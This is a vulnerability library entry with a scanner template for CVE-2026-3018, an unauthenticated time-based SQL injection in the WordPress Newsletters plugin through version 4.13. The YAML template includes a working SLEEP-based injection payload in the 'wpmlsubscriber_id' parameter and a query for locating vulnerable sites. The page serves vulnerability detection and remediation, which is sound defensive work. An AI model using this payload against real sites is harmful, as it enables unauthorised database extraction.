/Vulnerability Library

WordPress Newsletters <= 4.13 - Unauthenticated SQL Injection

CVE-2026-3018
Early Release

Description

Newsletters WordPress plugin <= 4.13 contains a time-based SQL injection caused by insufficient escaping of the 'wpmlsubscriber_id' parameter, letting unauthenticated attackers extract sensitive database information.

Severity

High

CVSS Score

7.5

Exploit Probability

18%

Affected Product

newsletters

Published Date

June 11, 2026

Template Author

pussycat0x

CVE-2026-3018.yaml
id: CVE-2026-3018

info:
  name: WordPress Newsletters <= 4.13 - Unauthenticated SQL Injection
  author: pussycat0x
  severity: high
  description: |
    Newsletters WordPress plugin <= 4.13 contains a time-based SQL injection caused by insufficient escaping of the 'wpmlsubscriber_id' parameter, letting unauthenticated attackers extract sensitive database information.
  impact: |
    Unauthenticated attackers can extract sensitive information from the database, potentially compromising data confidentiality.
  remediation: Update to the latest version beyond 4.13.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite/newsletters-413-unauthenticated-sql-injection
    - https://plugins.trac.wordpress.org/changeset/3566485/newsletters-lite
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-3018
    epss-score: 0.17572
    epss-percentile: 0.95259
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    vendor: tribulant
    product: newsletters
    framework: wordpress
    publicwww-query: "/wp-content/plugins/newsletters-lite/"
  tags: cve,cve2026,sqli,wp,wp-plugin,newsletters-lite,time-based-sqli,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/newsletters-lite/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Newsletters")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        regex:
          - '(?i)Stable\s*tag:\s*(\d+\.\d+(?:\.\d+)?)'

  - raw:
      - |
        @timeout: 20s
        GET /newsletter-management/?method=unsubscribe&wpmlsubscriber_id=1'+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn)+AND+'1'='1&authkey=x&wpmlmailinglist_id=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(body, "wp-content") || contains(body, "wordpress") || contains(body, "newsletter")'
        condition: and
# digest: 490a004630440220171be48e4d46d404aaeefa02a51de7da6f422babfcfed37611cae1afba1758a50220386912b8c7823135819cb4c0538f0ee8b74cc677b81b7678acc41f697f86d1ab:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-3018
CWE ID:
cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite/newsletters-413-unauthenticated-sql-injectionhttps://plugins.trac.wordpress.org/changeset/3566485/newsletters-lite

Remediation Steps

Update to the latest version beyond 4.13.